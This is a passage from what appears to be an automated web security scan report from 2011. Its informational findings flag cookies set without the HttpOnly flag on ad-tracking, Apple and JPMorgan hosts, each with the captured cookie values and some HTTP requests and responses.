UA=AAAAAQAUcy1Eb6q7HN_gnTNnrLjvLE6pZsoDA3gBdZHNS1RhFIef8zJXHCJaGIHjRLlQZPArESeLCjfmbARB_4IRUpCRlhJmbmT6QAiSoI0VjYpaOqEIYzQtXEQLF0IgiIMIBpOQoJI6mni8zcxd3dW5933u8577Owcowrw.xGqeQKqnYHcP8ILUfvwcb8As3McKhZFgO2QaHBZ7mPUm1ZtUbzfHnl4KBbJep3od6gUd1hTBjEaw2uJIXRL.RnIsmt7vw8ReKDtA6sfgYNthO8OY6R6scDly8xGcFOTZxlAhZuYtVucscqsF_k04bNCPeRPWDP1IzTPY057_80XX_lRh5paVPUduz8DpvsPSpZrvWOcS03xzmu8kz1aGXmm.VvXatd8X9XRe2TtXHv_EvOzAunMZCWzBTirPkj.6MV_Xse6OIveWEKMzzXrJpZS7l0i7e_MZt_1FE0det_1FE79.Y7o28WxlkHLdX6o39y_.1bJxfTau7mLgomvPxbIqdWktGX7CBbjWp9c0CnhmpU4LtQVXpNjjkxLxy1U9eDAi57j0u1RoeffNPhyP2R9_arGL74NUKnu_bLOxAanWN7lxvah38LwVnAFxqaDU; Domain=.amgdgt.com; Expires=Thu, 11-Aug-2011 20:39:29 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.112. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 11-Jul-2013 20:46:59 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.113. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.114. http://blog.katango.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.katango.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hiab=nnascar; path=/; domain=blog.katango.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.katango.com
Proxy-Connection: keep-alive
Referer: http://prod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.115. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ut="1%3AVZJJkoQgFETvwtoFoKL2bRQHHFAGLdSi7t4MRkfX9kW%2BnxkEb%2FDC4OcN5u4ym2o1%2BAG65FdrkapFmlpkYSI03S8H1LDPAVC2kPEi3cuiHWYi%2Fw%2Bz1SUXVtYB%2Blt1uAVNAOpW0t066o6cNrW4LmD9qPns6vZrpuxRe8KdanjVR9DLJQ%2BgFRHI5cicghpTRpDCk%2FjEiuNyeUymskjTnDcRiIJvTqG66KKCZBUU3qk4cO3pM3Cw2OIbLl0iq%2B10Fapppy2mzML3oB1xnJTt7dbqTKBn3Hgw35QRPf0pMoxDcZyi1L%2BzPqeqeV6QlYOETPjUeOdfcPuGU8EMx76AwKdAD%2BqiDhSvUcYCnkr%2FgopxbDOr%2B0TnYguH%2BBojmkxTqOMMewAS0NTr2qkxfAXw%2BfwC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:09 GMT
vsd=0@3@4e1cb129@www.imiclk.com; path=/; domain=.adbrite.com; expires=Thu, 14-Jul-2011 20:40:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.116. http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gw-services.vtrenz.net
Path:	/WebCookies/iMAWebSyncIDAppender.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerb2b-gw-services.vtrenz.net-http=206010378.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebCookies/iMAWebSyncIDAppender.js HTTP/1.1
Host: gw-services.vtrenz.net
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2010
Content-Type: application/x-javascript
Content-Location: http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js
Last-Modified: Fri, 16 Oct 2009 16:06:10 GMT
Accept-Ranges: bytes
ETag: "0456f937a4eca1:220a"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
Date: Tue, 12 Jul 2011 18:09:04 GMT
Set-Cookie: BIGipServerb2b-gw-services.vtrenz.net-http=206010378.20480.0000; path=/

function iMAWebSyncIDAppender() {
   var cookieName = 'com.vtrenz.iMAWebCookie';
   var iMAWindowOnLoad;

   this.main = function() {
       if(window.onload) iMAWindowOnLoad = window.onload;
       window.onl
...[SNIP]...

11.117. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325; domain=.interclick.com; expires=Mon, 12-Jul-2021 20:39:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.118. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.461_1401136140.76_1310782572.2018_1311177776.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902; domain=pubmatic.com; expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.119. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=CIcsZEOfgL0sAaZ8eSE17AFggQH5Wah4zHUw1N8AvvBssDHyYgWQL91QXmtQCmB4gSwkwYyqm73dAyXB2+z2e4ceAclkObFKyIELq4KsLieOpRdSvUJ+S6iLPn9mPiReSiQQSuJB5Xx8pd9k+fjRNrVLvYSR/N8CtSMpr2o0OIL/oPSq3G29JkjfYJLVKIaYLuI0MceBeHIdr7rjeAwBW93GO1YHAoo2M/YJJ1H79RcXMYqmAxSiNpRHubkoEESHcP58EF8xis6VYMFJ7/NPJfS2d2cy/5PnIef3J/ioYNgZ9FzbG5OQTPUNKsQ6vAOCgkodcB9q2br6R98WoPRTvLZIaONCl7pps02CG8aoBiwA9ZfnFFeyjMDfrEWZ3nUpObyFhipewZyfw46VH2lEGNCc1mbGQcwuLeku5yTG/i3spwWjqaT3N5UhDippIRy8awUxyxhMArUqq7Q0idZNXqa/9jndUv2NE57oFm708RdB0z89rJNr1S6jjRD2iu6MLWFIXVnDCk0EAImAauOAKV0fJbW6RngJTPb5vevYhxpFLnHEn3RIGcxXM0KoB1Qs; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.120. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=qqRmbycaEdWv2ZnmA2CwWnaQ7IYfLpsMkc+Bn0i2XHLbR7gKLjXcOtz2c+ZUfbZXcZscQs/AXl4PaPr9HuQ4FzZ66Pl0PDDwngZT6lsIbLOF09sUk+P6SIf54aYx5xNmId5A+wIczriN4VqQHs9VO4DBduMbAoToPmNYdLkGTHQqnX+BIwSuVJemestpIM+fza/6QxefclqBxGiK22BY1XpkdF9n9Qgd/pV85T5DqbbID55xGbe33wbAHE59DUMlKa0TwWxBIkxyEGPXGGerewFMUUbYls+/ycEQyuu8FnWNXizkulCFro0Sl00qbBNyDBVdoF6Oh01kny5mZlzhsBMBYJysPo/SjmHxnrwfWE7pzBvkoTY5WpOjOPcrTTJcv05CN5ZkxB/AUdIc2l/fuXXJUOka/ysYajuPN9hTPPN4kF8u8eZ9ZsNtiUPYqgE5GzBs/7fkZB59tD2XoRWJoK/txiars8qRpbVwlfNrS5iBTt7Kz6tFdKeoCKBFqXkY/Fe9oUgP7AXi0aZVyMroDZadqSOfUXZFzvAAGQ0/tVvSjIGlrhJ+mzUeLdYG9PrX; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.121. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=CYikw9mUNd+LksdcL1yhHxAK/7W6WcnsQkboRUpHtEDnN0V8p9KL++okE5cE6iwecDzjEUeVIpdTy9LQKFxE+1oMp7pNUpcSLfn2E3nLJTHSATGO1JPQtxjlJnQW/zLcDX9N/oV+Tyxo23oLguPmXP815X/38kpCwKlppUs8Wu5c2CJ+QV3VUDkiFQOM7fvb33OneKiZrCQnvlz7peX4bdktGC01Eivt1JoL3oNyeKJ7NJ1Bs0fsGdBpgU+4v9v51NM0+g5Ji5hCkrN4M49XFyPLMrfUgQai61WxI3f4zRRFMS3H32HAqrZ38/IbdBqTebGNzlp0yFkbeEeH/TF0OHCNKEgeYeGKbgVdY9KM8bHSZ03WWPRsmHtUAZ6sfONQHgHm+/+jKy5EHFIKmvOIhbc4/eCAMXtzchQeTf0cs4kwkF5OH3xNtAupUIzWXkWTPtjelZUfwLn07EFbzWrK98+FODVLywjyVdzPpPlAZGChoASpQEqJjNY8+aAn2kbSzg0XQY+4M08V9ON10ikUSD1wi1EB1iCHaCxIeRWXpA8NSHt9636T0Sy54wo8WTaX; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.122. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=/GWqwGkzN6Ws3leoAolktOEan1NuvFXQIf/3yzNmSeVJ8DHb7FRpK8DbWRV/yanDpTRknPEuRYyT2l4s+iyqQz1XJAvuebXB/JPDrYBDcCfTsFWBMAlecqV0+cyr1JKYYDn8dXOsvljXIPE6ZAIrD2x3m6Z9qD7jJw76XlIU+ZR1v7fYF+lGLxsdn01CTbAdaYNwHpixwAugmm5SdMhkXGtW/V0ymHvytmVCuq0k8DLIJfqwVTd8T3T7jjF7FbQ4jLtQB4ZYyxAXVSlmr3vBQaFjG34/9qt0OxOBoDHwCJPgK6Cd1A7cU+fLEVkm8MD2Bu1OPGkXyRjGSs2HqppbQQ5tt6APBA0P6jXXcbI48oh55lgUAvgpAWjZxIfj7DLPsILLMHwrjK0Cx2RktBDCnjSAQIPCbfuGhNknwQRaZqhfGMm5oD9WqQEMSWYyQMBW7rOLvjN/dEvjp3GucxubTpZidqjs+Fwp5wSPJ9J2OVr1YOIZ1YzKtyNBd+88ZlnYiPcW9jp1inzVmYAvJ21IVATu2QxPuUmYLUE3XMWVYIPc4vh7CVI8TBZbqKjY/4io; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.123. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=LvsMZVBspvaW4BUPGB6fKdPBPBPzE4AOtMKQi09iCxvY4N37bXjgonzBRHeFv2bG1tXHPZvA5MDeefh4/4TJNguxYj5BQwlRBhHp8PTaLmLqpAMt7mTrw8KDUlygfnKiG4Z2qArfl9OTnmApOm1vsUekipjsJLNg20mj9qF9yVGby+gT1Gmx0RyRL8RkbjcrMdJpW1HChNjPtBRas7ZTl7d+lqgklAWUbcu+NAnAIIIF1PpC8pejxLXSH0gVYkPbAxhBiAbc1JxNFqINo1qN9hJk3O2MQWv3SzuL9Wf9SajDU6i73sQ0InJo3gud5pExCGD4pGxQNmI1FNd763dPwNKMFx/s+AE3WDYZdU2V9GNIIz6x7Ih7McicbCDvHr6Htvkp4grfBYDv2dZfxkSViMVIcHIbpJM3oQKjws6IBGjACKCFM+r5EiYH+XqIkbkwT3vq3yO7XXMt4QsKmocL8aU/YwaxusrTYvZXLTiR3xnjy4OA+aV/AW+br6xTcZlDVGCDNfVBY/35TAWOdwplNEto/K0MAMDKYqZXRoyu9sulNBarcwVrWptUiw5X1lfq; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.124. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=uBJRarGVcixAAGSJWzd8d3vxOg/2vSQlRKgrn/RhMuw6NOSdGGc7KhKoy98rT4JxkLPJGcA3G9JVZAKGGUeg0rfqqiJYEIZH3tG4GNao0NE7SqYO5kHNKRZnb2vkIh1+qYDl2ifZGy0POZ8QUYLzaCgiyNlZL5VDv9NhNWAjp97Is3YF3y20l8guUegLMOCwy6y7HJkzOBGxL/wFIxpaDfsp6aWi54M6uHhC29rySJuwnL+BWcVS9xqn+jQhS7msFYsY6R18o5ZJvdSAXByGqbg5REtWpLPIc/PzKvQjdnFOwWp2VlAL0jSLM7hGj7OIeIhamPPUj0ngSnKdT4xp04otxwH1GY1IGzoRcshhLZQWrPkz1JsU7/uXu0Ed9ByhWoKIxYzGOjc2Ss00WUF3y8kbPP/lRbac1Y8eT9J6atlIuTt9+NMYlbNDfZm3kD6KaRdxmy6hzYkPx8geQioXgS601762LWOwcz+/LpnFHCVXRR2bOG+Hn/yrMTk2X42217IRhIBUtth/MeUn6F3SxLHf7nnWg02vBWP8Fq4jLMxGg1I5euN50ftaUZfEaj3A; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.125. http://images.apple.com/global/styles/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=KajDDzf8359RIllNsZwDVIn4PhDV2a/MovXkjKgPIrS/hlS53q1JEe6rc01cFrsDdvrbccTge9mICJtvoZSIMg2qwrFXIVIfLh83DVGUTVzE88u69+1qWUa0nsoV9ZBXI5VC1aYFMQoKN+re9dwttn3vAgAryoBer9Blq44l+etpRQe2iTZg4vfWg5coocOCVmgBetXruD2T5RxwRnvz3jCd3+78NTu5N8h75eTqhGInDJqrs12upYnx7R2AOfFDZ3MaD5/ZxBv/4g0YMW18kSHsbj3Wyy86hXmyt9nsiLAdQlxCbNOHx+4osjg8XCP89Ab/65LLAZiQBHCPKGyoMQvrJXqK2pndhdjTDh08xFDqxhqGk9IFY5rZ9mmUQhZL/djoMdk99Ai2w2OytbYFO5j+jEFERbJhmtOxA8XIhp6ntRgwBRDDb88kpxgwAIQA38MbeQIDt3TNd09PM7jZ9Zb6Iwqx9iaSqkwLP/nd/xxegQNdOZhzAOp5e5f54LOADbbvSAEePr5p0WDeJXJ7sbWl7Gsj/T4YqXwORulv161moKa4iW+ZwTFrJEUN8pac; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.126. http://images.apple.com/global/styles/itunesmodule.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/itunesmodule.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=hbVmdnpxNIgF+OiSJhok9CMWAzQhliHSQUaBAqwwAw1cUBvzE+pThCdfyIeFNPO0uBm2HVywloeii+ejfp56dywlCAv2HvSHu8ETLcRlTeGEuLnobqfKF+tYcs8BOzPt7KgfPldd4eJWTNOxhIChlCyJycuYGuo/aMTtUigvqr3S3p9d9ZklWvqGwj5f7h0rMCr0X5kwMhQF1pbWImeuCQUKtD/a4fxbAr5sqvEyYW9vUOgdrz9GHO7a9H5ot4fdHaE7v55cIT2P1g86itrgY8rb7nwTkVIE2aP0I3wXy3EpXgf7Pe8ge3nJNI4YbFyuM/kZzRqSatLfkKQvk0gtMRiYfeszzZfzGbaLDcZrHx05ZZ0/IyCT5BTCNP2AYe+qNk9IQM3u4EVOhQ6Vss5xwG3zF/lxxcV3JQY0Xj4jn1lj+jRiBRbjz1WjNIapP5Gffzzt6XK+55KPGo78F4IPWcJdKCF8+qErt/JjnHlWfTQBE0yiQw2LfK1kXBySN54ZRVdtarn3lxRLShUoa+ntmaWxQkNc92IG2NZZth4JzaYEWbsLjvThzDg9Sr7NDex/; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.127. http://images.apple.com/itunes/home/styles/home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/itunes/home/styles/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=1FciQd7giiJFEgv4vVPtMCBm7MZFgP3pI/vKQFStWClpRPhHQ3zP3nifi6OoK7SJm2x8HuCaAZ0okoSGVfzga0qB+Yj/bOcikQ4AhQPJ2J9zYOJu8IlZkWZf5AOzCPtxm33ikuaRS52LsB2FYvoSdBdbx9M53ArvvI4ElGA2adH+6bhRVxCRalHv2m0y3p+0yBuW5NB9xNj7uDFQhY+GWBCl8WtASWNuA3Rz8Q5J+ucOFGHueE7DC+Kka0HSvZ0uhTmjNtru2ipqpkoKe4kTNSyeoI/hT4HgUMiUzszj0f0J7fm4K2wp3h7NHocDwWbooSP/RMUOkiLNwaYD+3Ed+3JYffJC9wt3JNLtCSI3BEIqS8c3L5WKXc3/sHFN3A+qpiIGFCS0dOwXNofTCtSVi9mz2BtrPek+4uHVXMFWNrxir5yGDH2GG/p9aLl5uDHiPAzTXvR2c957Yq6MKYQm9hBiD+5/qGaJcz9SC3ShTTM5oxp2A46dVTVnaO9vqJYb2G5nEMOBaTiIOETdHfzDXMUQmGYLD6SzeZOPV9zbf7zIe9WDPN2D/Mpqw3CWYAvm; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.128. http://images.apple.com/itunes/styles/itunes.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/itunes/styles/itunes.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=kzcWN2xwscEDNLz4LsP8A+1esMW2xKyzkKKkvArVL9MstmsliwY6LtcUQ3+29SOj+20afrvi4F5iKw/pRCu+HDWWGKPctI/ZQnGjnSwmJQ6L1VqEpU12SUCNObJzJJLe4uzOp8j6a+aF4qCE5Mmrh8XSgj7vvA8MfK4iT9IdBew5EIHB9jCco1VJeZ5pX7zuKpS7f0jfXkS7JRPOYu4j6szcVOcRtYi8cdjtPOYLYpZHSc1EffdIN+EXBJ3S9P/gR9wiSvV+X+weNLfAmP9o5ycM0nkrZNbOyzdJa1BzWen5EDDKQg7jSYECbCA8iHr1qtpYOaxaC/Pjel+7EilWxxIWZC0xow8g/3XvePxjCV4lE+xMUtBoM+bCivcDfXDPVPvNcumNNe0ZBhqd2BRk3kT3G0kO5YR5xQ6yzXiZ9vYY1Wx3JEi/4F7hVbGI2tF9OXzFGHn7zXRPA+PdEAqxM8YDEE7Y6UmiC5iwqzsDfpvNU2VW5m4hoquq/jm8RUVhGbZOCs3ap30jHF7PHlHSH/3yqLPvNlcOq7bCQWMFpXdVZixeGx2YPt987Q3XgL9H; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.129. http://jpmorgan.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jpmorgan.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:08 GMT
Server: Apache
Location: http://www.jpmorgan.com/
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.jpmorgan.com/">here</a>.</p>
</body>
...[SNIP]...

11.130. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=YELHOFJwAob0FYVsKawubaYstKfAC0nRKIpwIg02FUBCdbdBVgwihXQFIQbmGUBCsGeBVgAQvaQFIQW4FUBCLppBVgQBaaQFIgZ4FUBCAGeBVgQ3gZQFIgJaGUBCcbpBVgAxBaQFIMqsGUBCBHoBVggWaaQFIYnXGUBC1mpBVgQUXaQFI4xlGUBCEdpBVgQwZaQFIcxvGUBCY8rBVgQjWaQFIYxvGUBCKopBVgQRgaQFI0soGUBCZTeBVEZAfZOiGVUj0Xw+NX8BzGmAPSqBJQqHBUbNGvBsDGAzPaQH3KdAsyrRdQb+BMzrG5hreQAL/ZUSGerJrAahe3qyIcydGAH; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.131. https://mm.jpmorgan.com/css/menu.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.132. https://mm.jpmorgan.com/css/morganmarkets.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/morganmarkets.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.133. https://mm.jpmorgan.com/css/yui/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"917-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
body{margin:10px;}h1{font-size:138.5%;}
...[SNIP]...

11.134. https://mm.jpmorgan.com/css/yui/button.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/button.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.135. https://mm.jpmorgan.com/css/yui/container.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/container.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.136. https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/reset-fonts-grids.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5745-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5745
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
html{color:#000;background:#FFF;}body,d
...[SNIP]...

11.137. https://mm.jpmorgan.com/css/yui/sprite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/sprite.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

